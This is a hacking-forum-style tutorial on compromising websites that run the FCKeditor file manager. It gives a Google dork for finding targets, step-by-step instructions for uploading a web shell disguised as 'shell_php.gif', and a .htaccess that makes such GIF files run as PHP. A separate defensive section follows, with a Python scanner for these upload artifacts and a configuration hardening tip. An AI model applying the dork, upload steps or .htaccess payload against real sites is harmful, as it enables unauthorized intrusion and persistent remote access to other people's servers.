What you will need:
1) Modified .htaccess (Code is below)
2) Shell in name_php.gif format
3) Site with FCKeditor
Chapter I - Collecting vulnerable site
It's easy to dork one.
Simple dork:
Code:
inurl:fckeditor intitle:Connectors Test
When you have found a site, navigate to:
Code:
/fckeditor/editor/filemanager/browser/default/connectors/test.html
Code:
http://www.site.com/fckeditor/
You add
Code:
editor/filemanager/browser/default/connectors/test.html
![[IMG]](http://img831.imageshack.us/img831/7673/regionmk.png)
Now here comes exploiting.
Chapter II - Exploiting
Select "PHP" from the top-left drop-down menu and click "Get folders". If it comes up with this:
![[IMG]](http://img37.imageshack.us/img37/4821/regionbp.png)
It means Connector is enabled and working.
Next thing you want to do is to create a new folder.
![[IMG]](http://img13.imageshack.us/img13/8355/regioney.png)
Once you have created it, click "Get folders" again to check that it exists.
![[IMG]](http://img651.imageshack.us/img651/8429/regionkl.png)
Open up Notepad and paste your shell source in it.
Save it as shell_php.gif.
In the current folder field, enter your new folder (in my case, tutorial-haxor) and press "Get folders" again.
![[IMG]](http://img705.imageshack.us/img705/4076/regionter.png)
![[IMG]](http://img59.imageshack.us/img59/8727/regionjj.png)
Now just upload .htaccess and shell_php.gif
![[IMG]](http://img233.imageshack.us/img233/5909/regionpt.png)
Just access your shell:
![[IMG]](http://img41.imageshack.us/img41/5332/regiondh.png)
And that's it.
I hope you enjoyed this little tutorial.
Thanks for reading!

1) .htaccess code:
Code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
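From the defender's side, the upload described above leaves two artifacts in the web-writable directory: a .htaccess that remaps a handler, and an image-named file containing PHP. The following is an added example, not part of the original post, that sweeps an upload root for both; the function names, reason labels and sample tree are assumptions constructed for illustration.

```python
import os
import re

# Directives that let a per-directory .htaccess change how files are executed.
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType|ForceType)\b.*php",
                        re.IGNORECASE | re.MULTILINE)
IMAGE_EXTS = (".gif", ".jpg", ".jpeg", ".png", ".bmp")
PHP_TAG_RE = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


def scan_upload_tree(root):
    """Return sorted (relative_path, reason) findings under an upload root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # only the first 1 MiB is inspected
            if name.lower() == ".htaccess":
                # Any .htaccess in an upload directory is suspect; a handler
                # override mapping files to PHP is the higher-severity case.
                override = HANDLER_RE.search(data.decode("utf-8", "replace"))
                findings.append((rel, "htaccess-handler-override" if override
                                 else "htaccess-in-upload-dir"))
            elif name.lower().endswith(IMAGE_EXTS) and PHP_TAG_RE.search(data):
                findings.append((rel, "php-tag-in-image"))
    return sorted(findings)


def build_constructed_sample(root):
    """Write a constructed sample tree (not real data) for demonstration."""
    os.makedirs(os.path.join(root, "tutorial-haxor"))
    samples = {
        "tutorial-haxor/.htaccess":
            b'<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
        "tutorial-haxor/shell_php.gif": b"GIF89a<?php /* placeholder */ ?>",
        "logo.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_sample(tmp)
        for rel, reason in scan_upload_tree(tmp):
            print(f"{reason:28} {rel}")
```

Setting `AllowOverride None` for the upload directory in the main Apache configuration makes Apache ignore an uploaded .htaccess entirely. The PHP-tag match on image files is a heuristic and can flag benign binaries, so treat hits as leads to review.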